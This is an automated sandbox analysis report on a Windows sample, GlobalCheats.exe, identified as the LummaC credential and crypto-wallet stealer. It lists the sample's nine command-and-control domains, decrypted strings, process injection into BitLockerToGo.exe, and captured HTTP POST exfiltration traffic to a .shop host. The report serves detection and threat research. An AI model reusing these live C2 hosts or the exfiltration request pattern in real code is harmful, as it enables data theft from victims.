Edit tour

Windows Analysis Report
GlobalCheats.exe

Overview

General Information

Sample name:	GlobalCheats.exe
Analysis ID:	1459156
MD5:	0786d76cbbf390b342c5b65f14a23530
SHA1:	2a758729935989e6f7c6cdd1ef3dbca7b2186e4d
SHA256:	4568c8c79b9a6fa899b07886d540c9a3e2afb124ab4ca1520eb8baea1a2dffc9
Tags:	exe
Infos:

Detection

LummaC, MicroClip

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

Yara detected MicroClip

Yara detected Powershell download and execute

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

GlobalCheats.exe (PID: 6764 cmdline: "C:\Users\user\Desktop\GlobalCheats.exe" MD5: 0786D76CBBF390B342C5B65F14A23530)

BitLockerToGo.exe (PID: 3592 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["richardflorespoew.shop", "strwawrunnygjwu.shop", "justifycanddidatewd.shop", "raiseboltskdlwpow.shop", "falseaudiencekd.shop", "pleasurenarrowsdla.shop", "feighminoritsjda.shop", "marathonbeedksow.shop", "backcreammykiel.shop"], "Build id": "LPnhqo--@zodiakw0rld"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1971278042.000000C000FEC000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_MicroClip	Yara detected MicroClip	Joe Security
Process Memory Space: GlobalCheats.exe PID: 6764	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: GlobalCheats.exe PID: 6764	JoeSecurity_MicroClip	Yara detected MicroClip	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3592	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3592	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: feighminoritsjda.shop

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["richardflorespoew.shop", "strwawrunnygjwu.shop", "justifycanddidatewd.shop", "raiseboltskdlwpow.shop", "falseaudiencekd.shop", "pleasurenarrowsdla.shop", "feighminoritsjda.shop", "marathonbeedksow.shop", "backcreammykiel.shop"], "Build id": "LPnhqo--@zodiakw0rld"}

Multi AV Scanner detection for submitted file

Source: GlobalCheats.exe

ReversingLabs: Detection: 28%

Sample uses string decryption to hide its real strings

Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: richardflorespoew.shop
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: strwawrunnygjwu.shop
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: justifycanddidatewd.shop
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: raiseboltskdlwpow.shop
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: falseaudiencekd.shop
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: pleasurenarrowsdla.shop
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: feighminoritsjda.shop
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: marathonbeedksow.shop
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: backcreammykiel.shop
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: Workgroup: -
Source: 0.3.GlobalCheats.exe.26459a00000.0.raw.unpack	String decryptor: LPnhqo--@zodiakw0rld

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_032C4E21 CryptUnprotectData,

4_2_032C4E21

Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62538 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62539 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62540 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62541 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62542 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62543 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62544 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62545 version: TLS 1.2

Source: GlobalCheats.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C0008DA000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000002.1971607307.000000C00119E000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000003.1953940488.00000264599B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C0008DA000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000002.1971607307.000000C00119E000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000003.1953940488.00000264599B0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	4_2_032CAA10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_032D6A63
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], B0852EF6h	4_2_032E9A70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_032E9A70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], E4AA2089h	4_2_032E5040
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	4_2_032E97A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ecx], al	4_2_032D5E2A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+78h]	4_2_032C4E21
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	4_2_032B9EC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	4_2_032B9EC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edx], al	4_2_032D6551
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	4_2_032E3482
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000B0h]	4_2_032CFCD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then xor ecx, ecx	4_2_032CFCD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push esi	4_2_032E6B63
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	4_2_032D034E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], dl	4_2_032D3BB4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	4_2_032E53E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	4_2_032D03D1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [edx+eax], cl	4_2_032B3A09
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	4_2_032E8210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [eax], 0000h	4_2_032C1268
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi]	4_2_032E324B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	4_2_032D42BB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, dword ptr [esp+08h]	4_2_032B9A90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_032B9A90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then inc ebx	4_2_032C42D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esi+50h], 00000000h	4_2_032C0976
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	4_2_032BD180
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	4_2_032E81E5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	4_2_032E89C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E23F8252h	4_2_032E5830
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E23F8252h	4_2_032E5830
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	4_2_032C081F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1CC2CF69h	4_2_032D5857
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, dword ptr [esi]	4_2_032E88B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	4_2_032E88B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	4_2_032CD8CC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_032D30C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	4_2_032C30C3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h	4_2_032D0F2E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esi+50h], 00000000h	4_2_032C0706
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, dword ptr [esi]	4_2_032E8790
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	4_2_032E8790
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	4_2_032B3640
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [eax+ebx*8], 11081610h	4_2_032C1E8F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	4_2_032E6E98
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push edi	4_2_032E7693
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edx], al	4_2_032D6563
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx edi, byte ptr [edx]	4_2_032E7D71
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000B0h]	4_2_032CF593
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	4_2_032E6DCB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+esi]	4_2_032CB422
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	4_2_032CB422
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_032E0C40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], 58C2BAB5h	4_2_032E9C50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_032E9C50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [ecx], eax	4_2_032CCCE2

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: richardflorespoew.shop
Source: Malware configuration extractor	URLs: strwawrunnygjwu.shop
Source: Malware configuration extractor	URLs: justifycanddidatewd.shop
Source: Malware configuration extractor	URLs: raiseboltskdlwpow.shop
Source: Malware configuration extractor	URLs: falseaudiencekd.shop
Source: Malware configuration extractor	URLs: pleasurenarrowsdla.shop
Source: Malware configuration extractor	URLs: feighminoritsjda.shop
Source: Malware configuration extractor	URLs: marathonbeedksow.shop
Source: Malware configuration extractor	URLs: backcreammykiel.shop

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18170Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20444Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 3801Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1269Host: backcreammykiel.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 554732Host: backcreammykiel.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: backcreammykiel.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: backcreammykiel.shop

Source: GlobalCheats.exe	String found in binary or memory: http://.css
Source: GlobalCheats.exe	String found in binary or memory: http://.jpg
Source: BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: GlobalCheats.exe	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: GlobalCheats.exe	String found in binary or memory: http://dejavu.sourceforge.net
Source: GlobalCheats.exe	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: GlobalCheats.exe	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: GlobalCheats.exe	String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000036000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://earth.google.com/kml/2.0
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000036000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://earth.google.com/kml/2.1
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000036000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://earth.google.com/kml/2.2
Source: GlobalCheats.exe	String found in binary or memory: http://emojione.com/licensingColor
Source: GlobalCheats.exe	String found in binary or memory: http://emojione.comEmojiOne
Source: GlobalCheats.exe	String found in binary or memory: http://html4/loose.dtd
Source: BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: GlobalCheats.exe	String found in binary or memory: http://ocsp.thawte.com0
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://onsi.github.io/ginkgo/#%s
Source: GlobalCheats.exe	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: GlobalCheats.exe	String found in binary or memory: http://s.symcd.com0_
Source: GlobalCheats.exe	String found in binary or memory: http://scripts.sil.org/OFL
Source: GlobalCheats.exe	String found in binary or memory: http://scripts.sil.org/OFLhttp://scripts.sil.org/OFL
Source: GlobalCheats.exe	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: GlobalCheats.exe	String found in binary or memory: http://sw.symcd.com0
Source: GlobalCheats.exe	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: GlobalCheats.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: GlobalCheats.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: GlobalCheats.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: GlobalCheats.exe	String found in binary or memory: http://www.ascendercorp.com/
Source: GlobalCheats.exe	String found in binary or memory: http://www.ascendercorp.com/http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.ht
Source: GlobalCheats.exe	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C00003A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000040000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000036000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opengis.net/gml
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000036000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.opengis.net/gml/3.2
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000036000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opengis.net/gml/3.3/exr
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000036000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opengis.net/kml/2.2
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000036000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.topografix.com/GPX/1/1
Source: BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 00000004.00000003.2010681855.000000000584D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000A32000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https:////iam.googleapish
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000A32000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https:////iam.googleapishttp/v1/:genhttps://iamcrede
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C0009CE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https:///v1/proj:generathttps://iamcredentials.09AZ__azRetryPolicyMessageBytes
Source: BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://api.midtrans.comInterSymbols-Regular.ttfradio-button-checked.svgSettings
Source: BitLockerToGo.exe, 00000004.00000003.1988225364.0000000003610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://backcreammykiel.shop/
Source: BitLockerToGo.exe, 00000004.00000002.2076899887.0000000003691000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075627627.0000000003691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://backcreammykiel.shop//
Source: BitLockerToGo.exe, 00000004.00000003.1988225364.0000000003610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://backcreammykiel.shop/api
